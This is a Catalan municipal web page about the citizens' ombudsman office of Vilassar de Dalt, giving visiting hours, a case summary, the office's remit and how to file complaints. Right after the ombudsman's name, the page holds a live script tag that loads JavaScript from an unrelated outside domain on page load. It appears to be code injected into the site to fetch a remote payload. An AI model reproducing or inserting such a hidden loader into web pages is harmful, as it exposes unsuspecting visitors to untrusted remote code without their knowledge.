Defensa Ciutadana de Vilassar de Dalt

Qui som

Xaro Mariscal Pablos

Defensora de la ciutadania<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Informacions

Horari de visites

A l'edifici de l'Ajuntament de Plaça de la Vila, 1.
Cada dimecres de 9 a 11 del matí.
Concerteu visita al 93 693 14 16.

Al 2013, FEM NET

Aquest títol es pot aplicar a molts àmbits. Des de la Defensa Ciutadana es comença amb il·lusió i amb ganes de fer bona feina, constructiva, útil...
Ja sabem que mai no plou a gust de tothom, caldrà però, fer un exercici de tolerància i respecte per aconseguir una bona convivència i progrés. D'entrada estem analitzant què tenim, què ens preocupa i ocupa i què en sabem!
La comunicació és un dels aspectes que cal millorar.

Llegeix més

Resum d'actuacions del mes de novembre

15/11/2012 - Esporgar arbres per problemes d’al·lèrgies i pudors “pipi can” al barri del Pi.

Seguiment 28/11/2012. Només s’ho han mirat però no fan res.
La regidora ha fet el seguiment de l’arbrat. Els plataners estan malalts i per això no s’esporguen; només es faran els de Manuel Moreno – Riera Salvet.
Del tema pipi-can no es té la mateixa impressió.

Què és i per a què serveix la nova figura de la defensora ciutadana?

És una institució de servei a les persones (físiques i jurídiques) que té com a finalitat vetllar per la defensa i reconeixement dels drets de la ciutadania en les seves relacions amb l’Ajuntament i les empreses, organismes i concessionaris que en depenen.
Serveix com a mecanisme de garantia pel respecte als drets i el compliment de les obligacions en el marc de l’actuació administrativa.

Llegeix més

En què pot intervenir?

En assumptes en què l'actuació municipal no hagi resolt per via ordinària i que hagin pogut produir una vulneració dels drets de les persones, com per exemple:
• Errors o arbitrarietats en l'aplicació de les normes legals o quan les normes no s'apliquin com cal.
• Tracte indegut als ciutadans.
• Retards indeguts en l'actuació administrativa.
• Inexecució de les pròpies resolucions adoptades.
• Negativa a facilitar la informació que els ciutadans poden sol•licitar.

Llegeix més

En què no pot intervenir?

En les queixes o reclamacions:
• que ja tinguin un pronunciament dels tribunals, les que es trobin pendents de resolució judicial o de reclamació administrativa en tràmit, o les admeses a tràmit quan després s'interposa demanda o recurs davant dels tribunals
• anònimes, sense fonament o que denotin mala fe
• que puguin comportar perjudicis al dret legítim de terceres persones
• de qüestions privades entre particulars (conflictes veïnals, laborals, mercantils...)
• que, pels canals establerts, encara no s'hagin plantejat a l'Ajuntament

Llegeix més

Presentar una queixa

Les queixes s'han de presentar personalment per escrit, per correu postal o per correu electrònic adreçades a:
Defensa Ciutadana
Planta baixa de l’Ajuntament (plaça de la Vila, 1)
08339 Vilassar de Dalt
defensaciutadana@vilassardedalt.cat
Es pot demanar cita al telèfon Tel. 93 693 14 16
L'escrit de queixa, que ha d'anar signat, ha de ser clar i concís, i ha d' indicar:
• el nom i els cognoms, l' adreça postal, i, si pot ser, el telèfon de la persona que el formula,

Llegeix més

Com actua?

Un cop rebuda la sol·licitud aquesta Institució envia un justificant de recepció a la persona interessada i la informa de si la queixa s'ha admès o no a tràmit.
L'admissió a tràmit significa que la Defensa, després d'estudiar l'escrit i la documentació aportada, decideix investigar el cas davant de l'Ajuntament per aclarir les causes del problema i recomanar, recordar o suggerir fórmules per solucionar-lo. En qualsevol cas les resolucions es comuniquen per escrit a la persona afectada.

Llegeix més

Pàgines